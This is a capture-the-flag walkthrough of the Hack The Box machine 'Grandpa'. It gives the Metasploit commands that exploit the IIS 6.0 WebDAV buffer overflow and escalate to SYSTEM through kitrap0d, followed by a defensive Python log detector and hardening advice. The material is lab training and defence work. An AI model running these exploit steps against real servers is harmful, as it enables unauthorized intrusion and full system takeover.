HTB 9. Grandpa
- 1. `nmap -T4 -A -p- 10.10.10.14` shows port 80 open with version Microsoft IIS httpd 6.0 (dated version) and potentially risky methods (TRACE and PUT).
- 2. Go to 10.10.10.14: shows an "Under Construction" page.
- 3. Google "Microsoft IIS httpd 6.0 exploit": finds "Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow" and the Rapid7 module page.
- 4. `searchsploit ScStoragePathFromUrl` shows python and ruby modules.
- 5. Metasploit:
  - `use exploit/windows/iis/iis_webdav_scstoragepathfromurl`
  - `set rhost 10.10.10.14`
  - `set lport 5555`
  - `show targets`
  - `run`
  If it fails, try running again (took 4 attempts).
- 6. We are not SYSTEM. `ps` shows processes. Pick a process running as NT AUTHORITY\NETWORK SERVICE and migrate to it with `migrate 1788`; success.
- 7. Priv esc suggester: `search suggester`, `use 0`, `options`, `set session 1`, `run`. Result: 9 options; go down the list and try each to see what works.
- 8. Start with `ms10_015_kitrap0d` and `set lhost tun0`.
- 9. `getuid` is NT AUTHORITY\SYSTEM.
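From the defender's side, the traffic in this walkthrough (PUT/TRACE allowed, WebDAV requests with oversized paths hitting IIS 6.0) is visible in the server's W3C logs. The following is an added example, not part of the write-up: a small Python detector run over constructed IIS 6.0 W3C Extended log lines that flags risky or WebDAV methods and abnormally long request paths. The field order and the `MAX_URI_LEN` threshold are assumptions to tune against real traffic.

```python
# Added example (not from the write-up). Flags IIS W3C log entries that use the
# risky methods nmap reported on this box (PUT, TRACE) or WebDAV methods, and
# entries whose request path is unusually long. Sample lines are constructed.
RISKY_METHODS = {"PUT", "TRACE", "PROPFIND", "MOVE", "COPY", "MKCOL", "DELETE"}
MAX_URI_LEN = 200  # assumed threshold; baseline it against normal traffic first

# Assumed default IIS 6.0 W3C Extended field order (overridden by a #Fields line).
FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
          "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status",
          "sc-substatus", "sc-win32-status"]

# Constructed sample log: one normal GET, one PUT, one PROPFIND with a 300-char path.
SAMPLE_LOG = (
    "#Software: Microsoft Internet Information Services 6.0\n"
    "#Fields: " + " ".join(FIELDS) + "\n"
    "2024-01-01 10:00:01 10.10.10.14 GET /index.htm - 80 - 10.10.14.5 Mozilla/5.0 200 0 0\n"
    "2024-01-01 10:00:02 10.10.10.14 PUT /test.txt - 80 - 10.10.14.5 DAVClient 201 0 0\n"
    "2024-01-01 10:00:03 10.10.10.14 PROPFIND /" + "A" * 300 + " - 80 - 10.10.14.5 - 500 0 0\n"
)

def parse_w3c(text):
    """Parse W3C Extended log lines into dicts, honouring a #Fields header if present."""
    fields = list(FIELDS)
    entries = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line: skip rather than mis-assign columns
        entries.append(dict(zip(fields, parts)))
    return entries

def find_suspicious(entries, max_uri_len=MAX_URI_LEN):
    """Return (time, client, method, reasons) for entries an analyst should review."""
    alerts = []
    for e in entries:
        method, uri = e["cs-method"].upper(), e["cs-uri-stem"]
        reasons = []
        if method in RISKY_METHODS:
            reasons.append("risky-method")
        if len(uri) > max_uri_len:
            reasons.append("long-uri")
        if reasons:
            alerts.append((e["time"], e["c-ip"], method, ",".join(reasons)))
    return alerts

if __name__ == "__main__":
    for alert in find_suspicious(parse_w3c(SAMPLE_LOG)):
        print(alert)
```

Disabling WebDAV and the PUT/TRACE verbs on a server that does not need them removes the class of request this detector looks for altogether.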